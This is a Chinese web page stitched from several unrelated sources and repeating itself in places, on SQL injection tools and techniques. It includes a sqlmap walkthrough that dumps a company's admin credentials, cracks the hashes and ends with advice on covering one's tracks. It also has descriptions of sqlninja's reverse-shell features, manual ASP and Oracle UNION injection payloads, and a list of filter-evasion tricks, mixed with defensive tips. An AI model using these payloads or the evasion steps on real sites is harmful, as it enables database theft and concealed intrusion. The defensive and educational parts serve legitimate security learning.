sql注入工具有哪些,什么是SQL注入？

sql注入工具有哪些,什么是SQL注入？详细介绍

本文目录一览： SQL注入—我是如何一步步攻破一家互联网公司的

【作案工具介绍】(1) AppScan渗透扫描工具Appscan是Web应用程序渗透测试舞台上使用最广泛的工具之一。它是一个桌面应用程序，它有助于专业安全人员进行Web应用程序自动化脆弱性评估。(2) Sqlmap渗透测试工具Sqlmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞。【作案细节如下】首先使用Appscan工具，对www.xxx.com互联网公司的官网进行扫描，扫描结果如下：在这56个安全性问题中，找到你感兴趣的链接，例如下面这条：http://www.xxx.com/system/cms/show?id=1为何要挑出这一条呢？因为它对于SQL注入比较典型，下面普及下SQL注入常用手法。首先用如下语句，确定该网站是否存在注入点：http://192.168.16.128/news.php?id=1原网站http://192.168.16.128/news.php?id=1’ 出错或显示不正常http://192.168.16.128/news.php?id=1and 1=1 出错或显示不正常http://192.168.16.128/news.php?id=1and 1=2 出错或显示不正常如果有出错，说明存在注入点。在判断完http://www.xxx.com/system/cms/show?id=1该链接存在注入点后，接下来就启动我们的渗透测试工具Sqlmap，进行下一步的注入工作，详细过程如下：1) 再次确认目标注入点是否可用：python sqlmap.py -uhttp://www.xxx.com/system/cms/show?id=1参数：-u：指定注入点url结果：注入结果展示：a. 参数id存在基于布尔的盲注，即可以根据返回页面判断条件真假的注入。b. 参数id存在基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。c. 数据库类型为：MySql 5.0.122) 暴库所有数据库：一条命令即可曝出该sqlserver中所有数据库名称，命令如下：python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --dbs参数：--dbs：dbs前面有两条杠，列出所有数据库。结果：结果显示该sqlserver中共包含3个可用的数据库。3) 获取当前使用的数据库python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --current-db参数：--current-db：当前所使用的数据库。结果：4) 获取当前数据库使用账户python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --current-user5) 列出sqlserver所有用户python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --users 6) 获取当前用户数据库账户与密码python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --passwords结果显示该用户可能无读取相关系统的权限。7) 列出数据库中的表python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store --tables 参数：-D：指定数据库名称--tables：列出表结果：结果显示共列出了69张表。8) 列出表中字段python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin --columns参数：-D：指定数据库名称-T：指定要列出字段的表--columns：指定列出字段结果：9)暴字段内容python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status" --dump参数：-C ：指定要暴的字段--dump：将结果导出如果字段内容太多，需要花费很多时间。可以指定导出特定范围的字段内容，命令如下：python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status" --start 1 --stop 10 --dump参数：--start：指定开始的行--stop：指定结束的行此条命令的含义为：导出数据库xxx_store中的表mall_admin中的关于字段(ag_id,email,id,mobile,name,password,status)中的第1到第10行的数据内容。结果如下：通过上图，我们可以看到admin表中的用户信息了。我们将password字段通过md5解密，可以得到hash的原文密码，通过用户名和密码，我们就可以登录该网站了。至此，我们已成功入侵到一家公司的后台，并拿到了相关的数据。不过要在这里提醒你：成功入侵只是成功了一半，另外最重要的一半是把屁股擦干净，不让别人发现你了！本文由腾讯WeTest团队提供，更多资讯可直接戳链接查看：http://wetest.qq.com/lab/转载请注明：熊哥club?SQL注入—我是如何一步步攻破一家互联网公司的标签：

SQL注入哪些工具最有效

SQL Power Injector是一款在.Net 1.1中创建的应用程序，可帮助渗透测试人员在网页上查找和利用SQL注入。特征
支持Windows，Unix和Linux操作系统
SQL Server，Oracle，MySQL，Sybase / Adaptive Server和DB2兼容
SSL支持
自动从网页上的表单或IFrame加载参数（GET或POST）
检测并浏览框架集
自动检测网站语言的选项
检测并添加加载页面进程期间使用的Cookie（Set-Cookie检测）
自动查找提交页面，其方法（GET或POST）以不同的颜色显示
可以直接在Datagrids中创建/修改/删除加载的字符串和Cookie参数
单个SQL注入
盲目的SQL注入
比较页面的真实和错误响应或cookie中的结果
时间延迟
SQL注入在自定义浏览器中的响应
可以使用HTML上下文颜色查看返回页面的HTML代码源并在其中搜索
微调参数和cookie注入
可以参数化预期结果的长度和计数以优化应用程序执行SQL注入所用的时间
创建/编辑预设的ASCII字符，以优化盲注SQL请求数/请求速度
多线程（最多可配置50个）
选项可以通过空的评论/ ** /针对IDS或过滤器检测来替换空间
在发送之前自动编码特殊字符
自动检测响应页面中的预定义SQL错误
在响应页面中自动检测预定义的单词或句子
实时结果
将会话保存并加载到XML文件中
自动查找正面答案和负面答案页面之间差异的功能
可以创建一个范围列表，它将替换隐藏的SQL注入字符串中的变量（>）并自动为您播放它们
使用文本文件中的预定义列表自动重播变量范围
Firefox插件，它将启动SQL Power Injector以及当前网页的所有信息及其会话上下文（参数和cookie）
两个集成工具：Hex和Char编码器和MS SQL @options解释器
可以编辑Referer
可以选择一个用户代理（或者甚至在用户代理XML文件中创建一个）
可以使用设置窗口配置应用程序
支持可配置的代理
软件截图
地址：http://www.sqlpowerinjector.com/index.htm
ilo--，Reversing.org - sqlbftools
地址：https://packetstormsecurity.com/files/download/43795/sqlbftools-1.2.tar.gz
Bernardo Damele AG：sqlmap，自动SQL注入工具
介绍
sqlmap是一款开源渗透测试工具，可自动检测和利用SQL注入漏洞并接管数据库服务器。它具有强大的检测引擎，针对终极渗透测试人员的众多特性，以及从数据库指纹识别，从数据库获取数据，到访问底层文件系统以及在操作系统上执行命令的各种开关，带外连接。
特征
完全支持MySQL，Oracle，PostgreSQL，Microsoft SQL Server，Microsoft Access，IBM DB2，SQLite，Firebird，Sybase，SAP MaxDB，HSQLDB和Informix数据库管理系统。
完全支持六种SQL注入技术：基于布尔的盲，基于时间的盲，基于错误，基于UNION查询，堆栈查询和带外。
支持直接连接数据库而不通过SQL注入，通过提供DBMS凭证，IP地址，端口和数据库名称。
支持枚举用户，密码哈希，特权，角色，数据库，表和列。
自动识别密码哈希格式并支持使用基于字典的攻击对其进行破解。
支持完全转储数据库表，根据用户的选择提供一系列条目或特定列。用户也可以选择仅转储每列条目中的一系列字符。
支持搜索特定的数据库名称，跨所有数据库的特定表或所有数据库表的特定列。例如，这对于识别包含自定义应用程序凭证的表格非常有用，其中相关列的名称包含名称和传递等字符串。
当数据库软件是MySQL，PostgreSQL或Microsoft SQL Server时，支持从数据库服务器底层文件系统下载和上载任何文件。
当数据库软件是MySQL，PostgreSQL或Microsoft SQL Server时，支持执行任意命令并在数据库服务器底层操作系统上检索它们的标准输出。
支持在攻击者机器和数据库服务器底层操作系统之间建立带外状态TCP连接。该通道可以是交互式命令提示符，Meterpreter会话或图形用户界面（VNC）会话，可以根据用户的选择进行选择。
通过Metasploit的Meterpreter 命令支持数据库进程'用户权限升级
地址：http://sqlmap.org/
icesurfer：SQL Server接管工具 - sqlninja
介绍
喜欢从Microsoft SQL Server上的SQL注入到数据库上的完整GUI访问？采用一些新的SQL注入技巧，在注册表中添加几个远程镜头以禁用数据执行保护，混合一个自动生成调试脚本的小Perl，将所有这些放在一个带有Metasploit包装器的振动器中，只有sqlninja的攻击模块之一！
Sqlninja是一款旨在利用以Microsoft SQL Server作为后端的Web应用程序中的SQL注入漏洞的工具。
其主要目标是在易受攻击的数据库服务器上提供远程访问，即使在非常恶劣的环境中也是如此。渗透测试人员应该使用它来帮助和自动化发现SQL注入漏洞时接管数据库服务器的过程。
特征
完整的文档可以在tarball中找到，也可以在这里找到，但是这里列出了忍者的功能：
远程SQL Server的指纹（版本，执行查询的用户，用户权限，xp_cmdshell可用性，数据库身份验证模式）
数据提取，基于时间或通过DNS隧道
与Metasploit3集成，通过VNC服务器注入获得对远程数据库服务器的图形化访问，或者仅上传Meterpreter
通过vbscript或debug.exe仅上传可执行的HTTP请求（不需要FTP / TFTP）
直接和反向绑定，TCP和UDP
当没有可用于直接/反向外壳的TCP / UDP端口时，DNS隧道伪外壳，但数据库服务器可以解析外部主机名
ICMP隧道外壳，当没有TCP / UDP端口可用于直接/反向外壳，但数据库可以Ping您的盒子
蛮力的'sa'密码（2种口味：基于字典和增量）
如果找到'sa'密码，权限将升级到系统管理员组
创建自定义的xp_cmdshell，如果原始的已被删除
TCP / UDP端口可以从目标SQL Server扫描到攻击机器，以便找到目标网络防火墙允许的端口并将其用于反向shell
回避技术混淆了一些IDS / IPS / WAF
与churrasco.exe集成，通过令牌绑架将权限升级到w2k3上的SYSTEM
支持CVE-2010-0232，将sqlservr.exe的权限升级到SYSTEM
地址：https://sourceforge.net/projects/sqlninja/files/sqlninja/sqlninja-0.2.999-alpha1.tgz/download

什么是SQL注入及SQL注入工具

分类: 电脑/网络 >> 程序设计 >> 其他编程语言
解析:

随着B/S模式应用开发的发展，使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高，程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据，这就是所谓的SQL Injection，即SQL注入。
SQL注入是从正常的WWW端口访问，而且表面看起来跟一般的Web页面访问没什么区别，所以目前市面的防火墙都不会对SQL注入发出警报，如果管理员没查看IIS日志的习惯，可能被入侵很长时间都不会发觉。
但是，SQL注入的手法相当灵活，在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析，构造巧妙的SQL语句，从而成功获取想要的数据，是高手与“菜鸟”的根本区别。
根据国情，国内的网站用ASP+Access或SQLServer的占70%以上，PHP+MySQ占L20%，其他的不足10%。在本文，我们从分入门、进阶至高级讲解一下ASP注入的方法及技巧，PHP注入的文章由NB联盟的另一位朋友zwell撰写，希望对安全工作者和程序员都有用处。了解ASP注入的朋友也请不要跳过入门篇，因为部分人对注入的基本判断方法还存在误区。大家准备好了吗？Let's Go...

入 门 篇
如果你以前没试过SQL注入的话，那么第一步先把IE菜单=>工具=>Inter选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。否则，不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的提示信息。
第一节、SQL注入原理
以下我们从一个网站19开始（注：本文发表前已征得该站站长同意，大部分都是真实数据）。
在网站首页上，有名为“IE不能打开新窗口的多种解决方法”的链接，地址为：19/showdetail?id=49，我们在这个地址后面加上单引号’，服务器会返回下面的错误提示：
Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误 在查询表达式 'ID=49'' 中。
/showdetail，行8
从这个错误提示我们能看出下面几点：
1.网站使用的是Access数据库，通过JET引擎连接数据库，而不是通过ODBC。
2.程序没有判断客户端提交的数据是否符合程序要求。
3.该SQL语句所查询的表中有一名为ID的字段。
从上面的例子我们可以知道，SQL注入的原理，就是从客户端提交特殊的代码，从而收集程序及服务器的信息，从而获取你想到得到的资料。
第二节、判断能否进行SQL注入
看完第一节，有一些人会觉得：我也是经常这样测试能否注入的，这不是很简单吗？
其实，这并不是最好的方法，为什么呢？
首先，不一定每台服务器的IIS都返回具体错误提示给客户端，如果程序中加了cint(参数)之类语句的话，SQL注入是不会成功的，但服务器同样会报错，具体提示信息为处理 URL 时服务器上出错。请和系统管理员联络。
其次，部分对SQL注入有一点了解的程序员，认为只要把单引号过滤掉就安全了，这种情况不为少数，如果你用单引号测试，是测不到注入点的
那么，什么样的测试方法才是比较准确呢？答案如下：
① 19/showdetail?id=49
② 19/showdetail?id=49 and 1=1
③ 19/showdetail?id=49 and 1=2
这就是经典的1=1、1=2测试法了，怎么判断呢？看看上面三个网址返回的结果就知道了：
可以注入的表现：
① 正常显示（这是必然的，不然就是程序有错误了）
② 正常显示，内容基本与①相同
③ 提示BOF或EOF（程序没做任何判断时）、或提示找不到记录（判断了rs.eof时）、或显示内容为空（程序加了on error resume next）
不可以注入就比较容易判断了，①同样正常显示，②和③一般都会有程序定义的错误提示，或提示类型转换时出错。
当然，这只是传入参数是数字型的时候用的判断方法，实际应用的时候会有字符型和搜索型参数，我将在中级篇的“SQL注入一般步骤”再做分析。
第三节、判断数据库类型及注入方法
不同的数据库的函数、注入方法都是有差异的，所以在注入之前，我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer，网上超过99%的网站都是其中之一。
怎么让程序告诉你它使用的什么数据库呢？来看看：
SQLServer有一些系统变量，如果服务器IIS提示没关闭，并且SQLServer返回错误提示的话，那可以直接从出错信息获取，方法如下：
19/showdetail?id=49 and user>0
这句语句很简单，但却包含了SQLServer特有注入方法的精髓，我自己也是在一次无意的测试中发现这种效率极高的猜解方法。让我看来看看它的含义：首先，前面的语句是正常的，重点在and user>0，我们知道，user是SQLServer的一个内置变量，它的值是当前连接的用户名，类型为nvarchar。拿一个nvarchar的值跟int的数0比较，系统会先试图将nvarchar的值转成int型，当然，转的过程中肯定会出错，SQLServer的出错提示是：将nvarchar值 ”abc” 转换数据类型为 int 的列时发生语法错误，呵呵，abc正是变量user的值，这样，不废吹灰之力就拿到了数据库的用户名。在以后的篇幅里，大家会看到很多用这种方法的语句。
顺便说几句，众所周知，SQLServer的用户sa是个等同Adminstrators权限的角色，拿到了sa权限，几乎肯定可以拿到主机的Administrator了。上面的方法可以很方便的测试出是否是用sa登录，要注意的是：如果是sa登录，提示是将”dbo”转换成int的列发生错误，而不是”sa”。
如果服务器IIS不允许返回错误提示，那怎么判断数据库类型呢？我们可以从Access和SQLServer和区别入手，Access和SQLServer都有自己的系统表，比如存放数据库中所有对象的表，Access是在系统表[msysobjects]中，但在Web环境下读该表会提示“没有权限”，SQLServer是在表[sysobjects]中，在Web环境下可正常读取。
在确认可以注入的情况下，使用下面的语句：
19/showdetail?id=49 and (select count(*) from sysobjects)>0
19/showdetail?id=49 and (select count(*) from msysobjects)>0
如果数据库是SQLServer，那么第一个网址的页面与原页面19/showdetail?id=49是大致相同的；而第二个网址，由于找不到表msysobjects，会提示出错，就算程序有容错处理，页面也与原页面完全不同。
如果数据库用的是Access，那么情况就有所不同，第一个网址的页面与原页面完全不同；第二个网址，则视乎数据库设置是否允许读该系统表，一般来说是不允许的，所以与原网址也是完全不同。大多数情况下，用第一个网址就可以得知系统所用的数据库类型，第二个网址只作为开启IIS错误提示时的验证

什么是SQL注入？

所谓SQL注入，就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令，比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的，这类表单特别容易受到SQL注入式攻击．
当应用程序使用输入内容来构造动态sql语句以访问数据库时，会发生sql注入攻击。如果代码使用存储过程，而这些存储过程作为包含未筛选的用户输入的字符串来传递，也会发生sql注入。sql注入可能导致攻击者使用应用程序登陆在数据库中执行命令。相关的SQL注入可以通过测试工具pangolin进行。如果应用程序使用特权过高的帐户连接到数据库，这种问题会变得很严重。在某些表单中，用户输入的内容直接用来构造动态sql命令，或者作为存储过程的输入参数，这些表单特别容易受到sql注入的攻击。而许多网站程序在编写时，没有对用户输入的合法性进行判断或者程序中本身的变量处理不当，使应用程序存在安全隐患。这样，用户就可以提交一段数据库查询的代码，根据程序返回的结果，获得一些敏感的信息或者控制整个服务器，于是sql注入就发生了。
如何防止SQL注入,归纳一下，主要有以下几点：
　　1.永远不要信任用户的输入。对用户的输入进行校验，可以通过正则表达式，或限制长度；对单引号和
　　双"-"进行转换等。
　　2.永远不要使用动态拼装sql，可以使用参数化的sql或者直接使用存储过程进行数据查询存取。
　　3.永远不要使用管理员权限的数据库连接，为每个应用使用单独的权限有限的数据库连接。
　　4.不要把机密信息直接存放，加密或者hash掉密码和敏感的信息。
　　5.应用的异常信息应该给出尽可能少的提示，最好使用自定义的错误信息对原始错误信息进行包装
　　6.sql注入的检测方法一般采取辅助软件或网站平台来检测，软件一般采用sql注入检测工具jsky，网站平台就有亿思网站安全平台检测工具。MDCSOFT SCAN等。采用MDCSOFT-IPS可以有效的防御SQL注入,XSS攻击等，
SQL注入是用于从企业窃取数据的技术之一，它是在应用程序代码中，通过将恶意SQL命令注入到数据库引擎执行的能力。当通过SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串时，会发生SQL注入，而不是按照设计者意图去执行SQL语句。
SQL注入：利用现有应用程序，将(恶意)的SQL命令注入到后台数据库引擎执行的能力，这是SQL注入的标准释义。
所谓SQL注入，就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令，比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的，这类表单特别容易受到SQL注入式攻击．
SQL注入：利用现有应用程序，将(恶意)的SQL命令注入到后台数据库引擎执行的能力，这是SQL注入的标准释义。
随着B/S模式被广泛的应用，用这种模式编写应用程序的程序员也越来越多，但由于开发人员的水平和经验参差不齐，相当一部分的开发人员在编写代码的时候，没有对用户的输入数据或者是页面中所携带的信息（如Cookie）进行必要的合法性判断，导致了攻击者可以提交一段数据库查询代码，根据程序返回的结果，获得一些他想得到的数据。
SQL注入利用的是正常的HTTP服务端口，表面上看来和正常的web访问没有区别，隐蔽性极强，不易被发现。
SQL注入攻击过程分为五个步骤：
第一步：判断Web环境是否可以SQL注入。如果URL仅是对网页的访问，不存在SQL注入问题，如：http://www.../138001.shtml就是普通的网页访问。只有对数据库进行动态查询的业务才可能存在SQL注入，如：http://www...../webhp?id＝39，其中?id＝39表示数据库查询变量，这种语句会在数据库中执行，因此可能会给数据库带来威胁。
第二步：寻找SQL注入点。完成上一步的片断后，就要寻找可利用的注入漏洞，通过输入一些特殊语句，可以根据浏览器返回信息，判断数据库类型，从而构建数据库查询语句找到注入点。
第三步：猜解用户名和密码。数据库中存放的表名、字段名都是有规律可言的。通过构建特殊数据库语句在数据库中依次查找表名、字段名、用户名和密码的长度，以及内容。这个猜测过程可以通过网上大量注入工具快速实现，并借助破解网站轻易破译用户密码。
第四步：寻找WEB管理后台入口。通常WEB后台管理的界面不面向普通用户
开放，要寻找到后台的登陆路径，可以利用扫描工具快速搜索到可能的登陆地址，依次进行尝试，就可以试出管理台的入口地址。
第五步：入侵和破坏。成功登陆后台管理后，接下来就可以任意进行破坏行为，如篡改网页、上传木马、修改、泄漏用户信息等，并进一步入侵数据库服务器。
SQL注入攻击的特点:
变种极多，有经验的攻击者会手动调整攻击参数，致使攻击数据的变种是不可枚举的，这导致传统的特征匹配检测方法仅能识别相当少的攻击，难以防范。
攻击过程简单，目前互联网上流行众多的SQL注入攻击工具，攻击者借助这些工具可很快对目标WEB系统实施攻击和破坏。
危害大，由于WEB编程语言自身的缺陷以及具有安全编程能力的开发人员少之又少，大多数WEB业务系统均具有被SQL注入攻击的可能。而攻击者一旦攻击成功，可以对控制整个WEB业务系统，对数据做任意的修改，破坏力达到及至。
SQL注入的危害和现状
SQL注入的主要危害包括：
未经授权状况下操作数据库中的数据
恶意篡改网页内容
私自添加系统帐号或者是数据库使用者帐号
网页挂木马
如何防止SQL参数：
1，检查上传的数据，并过滤
2. 禁止拼接SQL字符串
3.使用SQL参数化处理
4．加载防入侵等硬件设施

什么是sql注入，怎么防止sql注入

原理
SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。
根据相关技术原理，SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致；后者主要是由于程序员对输入未进行细致地过滤，从而执行了非法的数据查询。基于此，SQL注入的产生原因通常表现在以下几方面：①不当的类型处理；②不安全的数据库配置；③不合理的查询集处理；④不当的错误处理；⑤转义字符处理不合适；⑥多个提交处理不当。
攻击
当应用程序使用输入内容来构造动态sql语句以访问数据库时，会发生sql注入攻击。如果代码使用存储过程，而这些存储过程作为包含未筛选的用户输入的字符串来传递，也会发生sql注入。sql注入可能导致攻击者使用应用程序登陆在数据库中执行命令。相关的SQL注入可以通过测试工具pangolin进行。如果应用程序使用特权过高的帐户连接到数据库，这种问题会变得很严重。在某些表单中，用户输入的内容直接用来构造动态sql命令，或者作为存储过程的输入参数，这些表单特别容易受到sql注入的攻击。而许多网站程序在编写时，没有对用户输入的合法性进行判断或者程序中本身的变量处理不当，使应用程序存在安全隐患。这样，用户就可以提交一段数据库查询的代码，根据程序返回的结果，获得一些敏感的信息或者控制整个服务器，于是sql注入就发生了。
防护
归纳一下，主要有以下几点：
1.永远不要信任用户的输入。对用户的输入进行校验，可以通过正则表达式，或限制长度；对单引号和
双"-"进行转换等。
2.永远不要使用动态拼装sql，可以使用参数化的sql或者直接使用存储过程进行数据查询存取。
3.永远不要使用管理员权限的数据库连接，为每个应用使用单独的权限有限的数据库连接。
4.不要把机密信息直接存放，加密或者hash掉密码和敏感的信息。
5.应用的异常信息应该给出尽可能少的提示，最好使用自定义的错误信息对原始错误信息进行包装
6.sql注入的检测方法一般采取辅助软件或网站平台来检测，软件一般采用sql注入检测工具jsky，网站平台就有亿思网站安全平台检测工具。MDCSOFT SCAN等。采用MDCSOFT-IPS可以有效的防御SQL注入，XSS攻击等。

如何对网站进行SQL注入

1.POST注入，通用防注入一般限制get，但是有时候不限制post或者限制的很少，这时候你就可以试下post注入，比如登录框、搜索框、投票框这类的。另外，在asp中post已被发扬光大，程序员喜欢用receive来接受数据，这就造成了很多时候get传递的参数通过post/cookie也能传递，这时如果恰好防注入程序只限制了get，因此post注入不解释
2.cookie注入，原理同post注入，绕过相当多通用防注入
3.二次注入，第一次注入的数据可能不会有效，但是如果将来能在某个页面里面被程序处理呢?注入来了……
4.csrf，适合后台地址已知并且存在已知0day，可以试试用csrf劫持管理员来进行操作（这招其实不属于sql注入了）
5.打碎关键字，比如过滤select，我可以用sel/**/ect来绕过，这招多见于mysql
6.有时候也可以sELeCT这样大小写混淆绕过
7.用chr对sql语句编码进行绕过
8.如果等于号不好使，可以试试大于号或者小于号，如果and不好使可以试试or，这样等价替换
9.多来几个关键字确定是什么防注入程序，直接猜测源码或者根据报错关键字（如"非法操作，ip地址已被记录"）把源码搞下来研究
10.记录注入者ip和语句并写入文件或数据库，然而数据库恰好是asp的，插马秒杀
首先你要了解什么是SQL注入漏洞，SQL注入漏洞就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令，比如很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的，这类表单特别容易受到SQL注入式攻击。
简单来说，网站一般都是由web应用程序，数据库，服务器等组成的，网站的所有用户数据，密码表单等等都是保存在数据库当中的，数据库的内容按到常理来说是只能在服务器内部进行查询，当然，但是，开发人员对客户端用户向客户端提交的参数没有进行过滤，那么，黑客就可以从客户端【浏览器，等等，详细可以学习http协议】向服务器提交查询数据库的SQL语句，如果提交的语句成功的被服务器给接收到并且执行么，那么黑客岂不是想怎么查询数据库里面的内容就怎么查询，不是么？那些管理账号密码，会员数据不是分分钟就到手了？SQL注入漏洞危害是非常大的。
当然，这种漏洞是根据提交参数没过滤而产生的，那么除了浏览器的get提交参数，http协议中还有，post提交，cookie提交，等等。注入漏洞不是网上那些所谓的黑阔，用什么啊D，明小子之类的乱检测一气而找出来的，如果楼主想研究这个漏洞的产生，原理，利用和防御，是需要进行代码审计，SQL注入语句基础，等等。
现在一般常用的工具：SQLmap【这是一款神器，现在是公认最强大的开源注入工具】
建议楼主去看几本书：《SQL注入天书》《SQL注入漏洞的产生与防御》
这个漏洞的利用不是几句话就能说清楚的，详细的可以追问，纯手工打字，望楼主采纳。

什么是mysql注入

所谓SQL注入，就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。
我们永远不要信任用户的输入，我们必须认定用户输入的数据都是不安全的，我们都需要对用户输入的数据进行过滤处理。
以下实例中，输入的用户名必须为字母、数字及下划线的组合，且用户名长度为 8 到 20 个字符之间：
if (preg_match("/^\w{8,20}$/", $_GET['username'], $matches)){ $result = mysqli_query($conn, "SELECT * FROM users WHERE username=$matches[0]");} else { echo "username 输入异常";}让我们看下在没有过滤特殊字符时，出现的SQL情况：
// 设定$name 中插入了我们不需要的SQL语句$name = "Qadir'; DELETE FROM users;"; mysqli_query($conn, "SELECT * FROM users WHERE name='{$name}'");以上的注入语句中，我们没有对 $name 的变量进行过滤，$name 中插入了我们不需要的SQL语句，将删除 users 表中的所有数据。
在PHP中的 mysqli_query() 是不允许执行多个 SQL 语句的，但是在 SQLite 和 PostgreSQL 是可以同时执行多条SQL语句的，所以我们对这些用户的数据需要进行严格的验证。
防止SQL注入，我们需要注意以下几个要点：
1.永远不要信任用户的输入。对用户的输入进行校验，可以通过正则表达式，或限制长度；对单引号和 双"-"进行转换等。2.永远不要使用动态拼装sql，可以使用参数化的sql或者直接使用存储过程进行数据查询存取。3.永远不要使用管理员权限的数据库连接，为每个应用使用单独的权限有限的数据库连接。4.不要把机密信息直接存放，加密或者hash掉密码和敏感的信息。5.应用的异常信息应该给出尽可能少的提示，最好使用自定义的错误信息对原始错误信息进行包装6.sql注入的检测方法一般采取辅助软件或网站平台来检测，软件一般采用sql注入检测工具jsky，网站平台就有亿思网站安全平台检测工具。MDCSOFT SCAN等。采用MDCSOFT-IPS可以有效的防御SQL注入，XSS攻击等。
MySQL SQL 注入SQL注入可能是目前互联网上存在的最丰富的编程缺陷。 这是未经授权的人可以访问各种关键和私人数据的漏洞。 SQL注入不是Web或数据库服务器中的缺陷，而是由于编程实践较差且缺乏经验而导致的。 它是从远程位置执行的最致命和最容易的攻击之一。
我们永远不要信任用户的输入，我们必须认定用户输入的数据都是不安全的，我们都需要对用户输入的数据进行过滤处理。
以下实例中，输入的用户名必须为字母、数字及下划线的组合，且用户名长度为 8 到 20 个字符之间：
让我们看下在没有过滤特殊字符时，出现的SQL情况：
以上的注入语句中，我们没有对 $name 的变量进行过滤，$name 中插入了我们不需要的SQL语句，将删除 users 表中的所有数据。
在PHP中的 mysqli_query() 是不允许执行多个 SQL 语句的，但是在 SQLite 和 PostgreSQL 是可以同时执行多条SQL语句的，所以我们对这些用户的数据需要进行严格的验证。
防止SQL注入，我们需要注意以下几个要点：
永远不要信任用户的输入。对用户的输入进行校验，可以通过正则表达式，或限制长度；对单引号和 双”-“进行转换等。
永远不要使用动态拼装sql，可以使用参数化的sql或者直接使用存储过程进行数据查询存取。
.永远不要使用管理员权限的数据库连接，为每个应用使用单独的权限有限的数据库连接。
不要把机密信息直接存放，加密或者hash掉密码和敏感的信息。
应用的异常信息应该给出尽可能少的提示，最好使用自定义的错误信息对原始错误信息进行包装
sql注入的检测方法一般采取辅助软件或网站平台来检测，软件一般采用sql注入检测工具jsky，网站平台就有亿思网站安全平台检测工具。MDCSOFT SCAN等。采用MDCSOFT-IPS可以有效的防御SQL注入，XSS攻击等。
教程来源：树懒学堂_一站式数据知识学习平台_MySQK 防止SQL注入

sql 注入 oracle 常见的库有哪些

　　目录：
　　0x00：判断数据库类型
　　0x01：获取基本信息
　　0x02：得到当前库所有表名
　　0x03：得到所有列名
　　0x04：获取列中数据
　　0x05：获取所有数据库
　　0x06：利用ORACLE的systeminfo权限拿下服务器下面是正文：
　　判断注入，我就不说了，大家都很熟悉了，and 1=1和and 1=2 ，当然我们这篇文章是建立在有注入的前提下，如果没找到的话，请直接略过。
　　当我们找到注入点的话，一般类似与asp/php/aspx?id=1这样的形式，（我没见过其他两种，见过的都是asp+oracle这种奇葩），在后面加注释符–，如果返回正常的话，大致可以判断数据库类型是mssql或者oracle，之后在根据oracle里面所特有的表查询
　　例如：and exist(select * from dual) 或者and exists(select * from user_tables)
　　利用的原理是dual表和user_tables表是oracle中的系统表
　　返回正常，那么就可以肯定这是oracle了，接下来你就要抓狂了，因为oracle 注入工具不多。只能手工了。0×01 获取基本信息1. 判断过注入了，接下来就看有几个字段了，同样可以使用oder by N 根据返回页面判断，这里不再赘述,由于oracle中对于字段类型要求很严格，所以在union查询之前，我们首先要确定字段类型，可以用如下语句and 1=2 union select NULL,NULL,……,NULL from dual–中间省略
　　然后将第一个NULL替换成1
　　这样就成了and 1=2 union select 1,NULL,……,NULL from dual–中间省略
　　如果正确，则说明在数据库中这个字段是数字类型，如果在当前页有此列数据，则也会在当前页特定位置显示。
　　如果错误，这将其替换成and 1=2 union select ‘1’,NULL,……,NULL from dual–中间省略
　　返回正常则说明此列是字符类型了。在下文中，我们假设为数字型，并且有6个字段
　　2. 接下来，我们获取数据库版本and 1=2 union select 1,2,(select banner from sys.v_$version where rownum=1),4,5,6 from dual
　　这里使用了sql语句的嵌套，然后在可以显示的位置，查询sys.v_$version，返回banner信息，同时也是数据库版本信息
　　3. 然后获取操作系统版本and 1=2 union select 1,2,( select member from v$logfile where rownum=1),4,5,6 from dual
　　3. 获取连接数据库的当前用户and 1=2 union select 1,2,( select SYS_CONTEXT (‘USERENV’, ‘CURRENT_USER’)from dual),4,5,6 from dual
　　现在服务器的基本信息，我们已经可以得到了，那么接着往下走，你应该知道该干什么了。0×02 获取当前库中所有表名and 1=2 union select 1,2,( select table_name from user_tables where rownum=1),4,5,6 from dual
　　oracle中数据库中所有的表都是保存在user_tables这张表中，这样我们就获得了第一个表名，假设是news 接下来再来获取第二个and 1=2 union select 1,2,( select table_name from user_tables where rownum=1 and table_name<>’news’),4,5,6 from dual
